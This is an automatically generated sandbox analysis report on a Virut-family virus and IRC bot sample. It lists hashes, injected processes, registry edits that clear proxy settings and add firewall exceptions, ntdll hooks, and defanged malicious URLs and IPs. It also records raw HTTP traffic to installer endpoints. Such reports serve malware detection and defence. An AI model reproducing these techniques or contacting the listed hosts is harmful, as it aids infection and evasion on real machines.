Virus.Win32.Virut_7874a076b2

by malwarelabrobot on June 27th, 2017 in Malware Descriptions.

GenPack:Win32.Virtob.Gen.12 (BitDefender), Virus:Win32/Virut.BN (Microsoft), HEUR:Virus.Win32.Generic (Kaspersky), Trojan.Packed.1895 (DrWeb), GenPack:Win32.Virtob.Gen.12 (B) (Emsisoft), Artemis!7874A076B2F0 (McAfee), Trojan.Gen.6 (Symantec), Virus.Win32.Virut (Ikarus), GenPack:Win32.Virtob.Gen.12 (FSecure), Win32:Patched-AFV [Trj] (AVG), Win32:Patched-AFV [Trj] (Avast), PE_VIRUX.GEN2-1 (TrendMicro), mzpefinder_pcap_file.YR, GenericIRCBot.YR, VirusVirut.YR (Lavasoft MAS)
Behaviour: Trojan, Virus, Packed, IRCBot


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 7874a076b2f09a3f7969b819cb4955e0
SHA1: fb20c513c9f92df43ac78088a46be53fd5dcea2e
SHA256: 7d35b9627560ba66d74da27bae143d1ff28507fb612afe27efdf29f67dc39e22
SSDeep: 1536:Nyj1MDNF0 YgNr adMGRtOh3RUn70ClN3XqeCgtBMps:Ej1aNS YgdLdMGRABUlNHqeCUBM2
Size: 70144 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2001-10-01 03:36:15
Analyzed on: Windows7 SP1 32-bit


Summary:

Virus. A program that recursively replicates a possibly evolved copy of itself.

Payload

Behaviour Description
IRCBot A bot can communicate with command and control servers via IRC channel.


Process activity

The Virus creates the following process(es):

INJ8027.tmp:3744
VRT7944.tmp:3276
VRT903E.tmp:2244

The Virus injects its code into the following process(es):

INJ98A6.tmp:2368
%original file name%.exe:3788
Explorer.EXE:520

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process INJ8027.tmp:3744 makes changes in the file system.
The Virus creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X66G0HIG\normal_bg[1].jpg (1160 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT (384 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TIR4YGN2\appImg[1].jpg (4 bytes)

The process %original file name%.exe:3788 makes changes in the file system.
The Virus creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X66G0HIG\nvlinfad[1] (630 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\Default[1] (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\toccolor[1] (522 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X66G0HIG\icw[1] (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IBPSKBRA\icwhd2[1] (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TIR4YGN2\icw[1] (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IBPSKBRA\hm_globe[1] (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TIR4YGN2\linefade_hrz[1] (85 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\arrow_dwn[1] (49 bytes)

The process VRT7944.tmp:3276 makes changes in the file system.
The Virus creates and/or writes to the following file(s):

C:\Windows\Temp\INJ8027.tmp (1 bytes)

The process VRT903E.tmp:2244 makes changes in the file system.
The Virus creates and/or writes to the following file(s):

C:\Windows\Temp\INJ98A6.tmp (1 bytes)

Registry activity

The process INJ98A6.tmp:2368 makes changes in the system registry.
The Virus creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadDecisionTime" = "60 45 15 8F 61 EE D2 01"
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\INJ98A6_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\INJ98A6_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad]
"WpadLastNetwork" = "{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}"

[HKLM\SOFTWARE\Microsoft\Tracing\INJ98A6_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\INJ98A6_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecision" = "3"

[HKLM\SOFTWARE\Microsoft\Tracing\INJ98A6_RASMANCS]
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadDecision" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 0A 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\INJ98A6_RASAPI32]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadNetworkName" = "Network 2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecisionTime" = "60 45 15 8F 61 EE D2 01"

[HKLM\SOFTWARE\Microsoft\Tracing\INJ98A6_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 39 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\INJ98A6_RASAPI32]
"FileTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\INJ98A6_RASMANCS]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecisionReason" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Virus deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process INJ8027.tmp:3744 makes changes in the system registry.
The Virus creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadDecisionTime" = "60 B6 17 8F 61 EE D2 01"
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\INJ8027_RASMANCS]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\INJ8027_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\INJ8027_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\DDECache\IExplore\WWW_OpenURL]
"WindowClassName" = "DDEMLMom"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1498459403"

[HKLM\SOFTWARE\Microsoft\Tracing\INJ8027_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecision" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\DDECache\IExplore\WWW_OpenURL]
"processname" = "iexplore.exe"

[HKLM\SOFTWARE\Microsoft\Tracing\INJ8027_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\INJ8027_RASMANCS]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadDecision" = "3"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "INJ8027.tmp"

[HKLM\SOFTWARE\Microsoft\Tracing\INJ8027_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadNetworkName" = "Network 2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecisionTime" = "60 B6 17 8F 61 EE D2 01"

[HKLM\SOFTWARE\Microsoft\Tracing\INJ8027_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3A 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\INJ8027_RASAPI32]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\INJ8027_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\INJ8027_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\INJ8027_RASMANCS]
"FileDirectory" = "%windir%\tracing"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Virus deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFavoritesInitialSelection"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFeedsInitialSelection"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process %original file name%.exe:3788 makes changes in the system registry.
The Virus creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\7874a076b2f09a3f7969b819cb4955e0_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1001896575"

[HKLM\SOFTWARE\Microsoft\Tracing\7874a076b2f09a3f7969b819cb4955e0_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 38 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Tracing\7874a076b2f09a3f7969b819cb4955e0_RASMANCS]
"MaxFileSize" = "1048576"
"EnableFileTracing" = "0"

"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\7874a076b2f09a3f7969b819cb4955e0_RASAPI32]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\7874a076b2f09a3f7969b819cb4955e0_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\7874a076b2f09a3f7969b819cb4955e0_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\7874a076b2f09a3f7969b819cb4955e0_RASAPI32]
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Virus deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process VRT7944.tmp:3276 makes changes in the system registry.
The Virus creates and/or sets the following values in system registry:
Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%WinDir%\temp]
"INJ8027.tmp" = "C:\Windows\TEMP\INJ8027.tmp:*:enabled:@shell32.dll,-1"

The process VRT903E.tmp:2244 makes changes in the system registry.
The Virus creates and/or sets the following values in system registry:
Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%WinDir%\temp]
"INJ98A6.tmp" = "C:\Windows\TEMP\INJ98A6.tmp:*:enabled:@shell32.dll,-1"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

The Virus installs the following user-mode hooks in ntdll.dll:

NtQueryInformationProcess
ZwOpenFile
NtDeviceIoControlFile
ZwCreateUserProcess
ZwCreateProcessEx
NtCreateProcess
ZwCreateFile

Propagation

VersionInfo

Company Name: Microsoft Corporation
Product Name: HD Player
Product Version: 6.00.2600.0000
Legal Copyright: (c) Microsoft Corporation. All rights reserved.
Legal Trademarks:
Original Filename: icwtutor.exe
Internal Name: icwtutor
File Version: 6.00.2600.0000 (xpclient.010817-1148)
File Description: Internet Connection Wizard
Comments:
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
. 4096 106496 64000 5.54309 baa533c55d7fce8e5763b19ad2c71ab8
. 110592 3189 3584 3.90247 f9e71b81c71bd620d9d8885d224266ca
. 114688 1696 2048 2.04695 2f316b27644023f1b96711d5ba588239

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://fun.losscook.bid/h_redir.php?offer_id=4&aff_id=3226&source=4364&aff_sub=&aff_sub2=&aff_sub3=&aff_sub4=LP_DEF&aff_sub5=1300290818&url=http://fun.losscook.bid/offer.php?affId={aff_id}&trackingId=244218551&instId=4364&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&net=4.5.50709&ie=9.0.8112.16421&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3 52.222.149.119
hxxp://way.doorcrayon.bid/aff_c?offer_id=4&aff_id=3226&source=4364&aff_sub=&aff_sub2=&aff_sub3=&aff_sub4=LP_DEF&aff_sub5=1300290818&url=http://fun.losscook.bid/offer.php?affId={aff_id}&trackingId=244218551&instId=4364&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&net=4.5.50709&ie=9.0.8112.16421&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3 34.253.150.26
hxxp://fun.losscook.bid/offer.php?affId=3226&trackingId=244218551&instId=4364&ho_trackingid=102818683555b138ae887006bd7923&cc=UA&cc_typ=ho&sb=x86&net=4.5.50709&ie=9.0.8112.16421&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3 52.222.149.119
hxxp://fun.losscook.bid/installer.php?affId=3226&instId=4364&ho_trackingid=102818683555b138ae887006bd7923&trackingId=244218551&cc=UA&untracked=&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3 52.222.149.119
hxxp://door.suitworm.bid/installer.php?affId=3226&instId=4364&ho_trackingid=102818683555b138ae887006bd7923&trackingId=244218551&cc=UA&untracked=&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3 54.88.21.193
hxxp://fun.losscook.bidhxxp://fun.losscook.bid/installer.php?affId=3226&instId=4364&ho_trackingid=102818683555b138ae887006bd7923&trackingId=244218551&cc=UA&untracked=&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3 52.222.149.119
hxxp://fun.losscook.bidhxxp://fun.losscook.bid/offer.php?affId=3226&trackingId=244218551&instId=4364&ho_trackingid=102818683555b138ae887006bd7923&cc=UA&cc_typ=ho&sb=x86&net=4.5.50709&ie=9.0.8112.16421&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3 52.222.149.119
hxxp://fun.losscook.bidhxxp://fun.losscook.bid/h_redir.php?offer_id=4&aff_id=3226&source=4364&aff_sub=&aff_sub2=&aff_sub3=&aff_sub4=LP_DEF&aff_sub5=1300290818&url=http://fun.losscook.bid/offer.php?affId={aff_id}&trackingId=244218551&instId=4364&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&net=4.5.50709&ie=9.0.8112.16421&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3 52.222.149.119
hxxp://way.doorcrayon.bidhxxp://way.doorcrayon.bid/aff_c?offer_id=4&aff_id=3226&source=4364&aff_sub=&aff_sub2=&aff_sub3=&aff_sub4=LP_DEF&aff_sub5=1300290818&url=http://fun.losscook.bid/offer.php?affId={aff_id}&trackingId=244218551&instId=4364&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&net=4.5.50709&ie=9.0.8112.16421&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3 34.253.150.26
hxxp://door.suitworm.bidhxxp://door.suitworm.bid/installer.php?affId=3226&instId=4364&ho_trackingid=102818683555b138ae887006bd7923&trackingId=244218551&cc=UA&untracked=&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3 54.88.21.193
dns.msftncsi.com 131.107.255.255
jhampt.com 148.251.79.206
teredo.ipv6.microsoft.com 157.56.120.207
uuacla.com


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY HTTP Request on Unusual Port Possibly Hostile
ET POLICY PE EXE or DLL Windows file download HTTP
ET MALWARE Windows executable sent when remote host claims to send an image 2
ET POLICY Suspicious Windows Executable WriteProcessMemory
ET TROJAN Backdoor User-Agent (InstallCapital)

Traffic

POST hXXp://fun.losscook.bid/installer.php?affId=3226&instId=4364&ho_trackingid=102818683555b138ae887006bd7923&trackingId=244218551&cc=UA&untracked=&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3 HTTP/1.1
Host: fun.losscook.bid
Connection: close
Accept: */*
User-Agent: InstallCapital
Content-Type: application/x-www-form-urlencoded
Content-Length: 362

cid=5c12d1104cca24294ae7d8d45ce8d028&uac=1&id[]=3970&id[]=3971&id[]=3972&id[]=3973&id[]=3974&id[]=3975&id[]=3954&id[]=3955&id[]=3956&id[]=3957&id[]=3958&id[]=3959&id[]=3960&id[]=3961&id[]=3193&id[]=3704&id[]=3706&id[]=3711&id[]=3712&id[]=3713&id[]=3985&id[]=3986&id[]=3987&id[]=3988&id[]=3989&id[]=3946&id[]=3947&id[]=3948&id[]=3949&id[]=3950&id[]=3951&id[]=3952
HTTP/1.1 403 Forbidden
Server: CloudFront
Date: Mon, 26 Jun 2017 09:49:46 GMT
Content-Type: text/html
Content-Length: 689
Connection: close
X-Cache: Error from cloudfront
Via: 1.1 ec6662ba477736a13086dd664a1145be.cloudfront.net (CloudFront)
X-Amz-Cf-Id: TnDuVvitYh9_KcubeimTbDal-46zcinlVNrqHtGYIR3JgrHMbYBzQQ==
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "htt
p://VVV.w3.org/TR/html4/loose.dtd">.<HTML><HEAD><MET
A HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
;.<TITLE>ERROR: The request could not be satisfied</TITLE>
.</HEAD><BODY>.<H1>ERROR</H1>.<H2>The re
quest could not be satisfied.</H2>.<HR noshade size="1px">
.This distribution is not configured to allow the HTTP request method 
that was used for this request. The distribution supports only cachabl
e requests..<BR clear="all">.<HR noshade size="1px">.<P
RE>.Generated by cloudfront (CloudFront).Request ID: TnDuVvitYh9_Kc
ubeimTbDal-46zcinlVNrqHtGYIR3JgrHMbYBzQQ==.</PRE>.<ADDRESS>
;.</ADDRESS>.</BODY></HTML>..



POST hXXp://door.suitworm.bid/installer.php?affId=3226&instId=4364&ho_trackingid=102818683555b138ae887006bd7923&trackingId=244218551&cc=UA&untracked=&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3 HTTP/1.1
Host: door.suitworm.bid
Connection: close
Accept: */*
User-Agent: InstallCapital
Content-Type: application/x-www-form-urlencoded
Content-Length: 362

cid=5c12d1104cca24294ae7d8d45ce8d028&uac=1&id[]=3970&id[]=3971&id[]=3972&id[]=3973&id[]=3974&id[]=3975&id[]=3954&id[]=3955&id[]=3956&id[]=3957&id[]=3958&id[]=3959&id[]=3960&id[]=3961&id[]=3193&id[]=3704&id[]=3706&id[]=3711&id[]=3712&id[]=3713&id[]=3985&id[]=3986&id[]=3987&id[]=3988&id[]=3989&id[]=3946&id[]=3947&id[]=3948&id[]=3949&id[]=3950&id[]=3951&id[]=3952
HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Mon, 26 Jun 2017 09:49:33 GMT
Connection: close
Content-Length: 41720
...H.....b.[k.........G.V...E.Xw%......n9.O.@..j.......bdM~._..h.a?..X
J.).t..*..>...q..yO......|..%.3#o.#....^T.M[...,..F.~..yLY..)F..Jn&
..S.i..6...[-;.......fV<....q..$T.^.f.zMG .g..=N....H.g.(......)...
....?0...YBXiB. ,..'.JH.0...g.0.*......N.x[Q.u..X..qd7....v.Yc...."..x
.._....Fx....5..v..W.c. ....P.>GP........CN..pq^.....$.B.e3.I..Y.,.
.^..4.....{9..=...........Xy>..<.R...V.o.V.o..}.i....a..A!.5.F..
t.YBu.v..,c...w.....5.{".."./..y,RG.<@.D...8.QO.&oA.KW.B.>9.v..@
....].!...N.uc........S......%....}.f.I.....s..m..6.L....~..DQyb.{h..v
@pr...g..L.C2n.}.K.......]..u...\..J..J.KL..........g.s...=>...w...
f9c....Q9.....t=.......x...F..80pG...F.....8......Y=.~.Q.aR.../W.#.]&l
t;B.m.bd.Je..7..7....ic.)....@.s...:*).?.........I&.....e.ZO...E.?.Ff.
R.O@..a.....V...[..X..F{. c.R...SA<..M~.Ys..)..b ?...VQ[..F.7x'c.q.
...l.L..\..b..!O...k..1......kml.d....`..c....0..\.. k...\.R(......f&.
.l\>....."(..../"....U...e..J..YJ..##....V`x.%Q...;.|p....7......r.
4...k....M.x..<5..t.Z........F.._..............L`D_..8...Z.gO].Og..
f.....?.R.....}$..{q}.$..E......t...\.d.....,..X)vbm..\.o[I...W D.Q...
-=..$.a.........q..CvB.V..1.$7.....!...i .~.....Fw.S.....P...........k
~.e..=R.y.U..d}..\....F.%..W....b.../.,..".....K..R\........n.........
s..b... ..k..=..}s...\h...u.!.b...8...x..~6.............Y.{.........2.
..Z.n-8.e.7N.?........3....=r...".3#......m,..*x.U....@..YU/..`...q8..
Q....].D..U.#..D..`...,.........h.%....[1sD...........Z.y%9*../C...R).
.../-..*U..,..0&#.....a..R...m]p.._l.,.Z....J..<..06..j.....O
<<< skipped >>>


GET hXXp://fun.losscook.bid/h_redir.php?offer_id=4&aff_id=3226&source=4364&aff_sub=&aff_sub2=&aff_sub3=&aff_sub4=LP_DEF&aff_sub5=1300290818&url=http://fun.losscook.bid/offer.php?affId={aff_id}&trackingId=244218551&instId=4364&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&net=4.5.50709&ie=9.0.8112.16421&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3 HTTP/1.1
Host: fun.losscook.bid
Connection: close
Accept: */*
User-Agent: InstallCapital


HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Content-Length: 643
Connection: close
Location: hXXp://way.doorcrayon.bid/aff_c?offer_id=4&aff_id=3226&source=4364&aff_sub=&aff_sub2=&aff_sub3=&aff_sub4=LP_DEF&aff_sub5=1300290818&url=http://fun.losscook.bid/offer.php?affId={aff_id}&trackingId=244218551&instId=4364&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&net=4.5.50709&ie=9.0.8112.16421&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Mon, 26 Jun 2017 09:49:30 GMT
X-Cache: Miss from cloudfront
Via: 1.1 4ba0e9deb9465045a3261b8712935964.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 3REdmkZMO_NuJcnW5uuXxOUnFM2R-PY9D3fydvyT-voco8tvb33uWw==
<head><title>Document Moved</title></head>.<
;body><h1>Object Moved</h1>This document may be found &
lt;a HREF="hXXp://way.doorcrayon.bid/aff_c?offer_id=4&aff_id=3226&
amp;source=4364&aff_sub=&aff_sub2=&aff_sub3=&aff_sub4=
LP_DEF&aff_sub5=1300290818&url=http://fun.losscook.bid/o
ffer.php?affId={aff_id}&trackingId=244218551&instI
d=4364&ho_trackingid={transaction_id}&cc={cou
ntry_code}&cc_typ=ho&sb=x86&net=4.5.50709&ie=9.
0.8112.16421&wv=7sp1&db=InternetExplorer&uac=1&cid%3
D5c12d1104cca24294ae7d8d45ce8d028&v=3">here</a></body&
gt;..
<<< skipped >>>


GET hXXp://way.doorcrayon.bid/aff_c?offer_id=4&aff_id=3226&source=4364&aff_sub=&aff_sub2=&aff_sub3=&aff_sub4=LP_DEF&aff_sub5=1300290818&url=http://fun.losscook.bid/offer.php?affId={aff_id}&trackingId=244218551&instId=4364&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&net=4.5.50709&ie=9.0.8112.16421&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3 HTTP/1.1
Host: way.doorcrayon.bid
Connection: close
Accept: */*
User-Agent: InstallCapital


HTTP/1.1 302 Found
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 26 Jun 2017 09:49:44 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Location: hXXp://fun.losscook.bid/offer.php?affId=3226&trackingId=244218551&instId=4364&ho_trackingid=102818683555b138ae887006bd7923&cc=UA&cc_typ=ho&sb=x86&net=4.5.50709&ie=9.0.8112.16421&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3
P3P: CP="NOI CUR OUR NOR INT"
Pragma: no-cache
Server: nginx/1.11.8
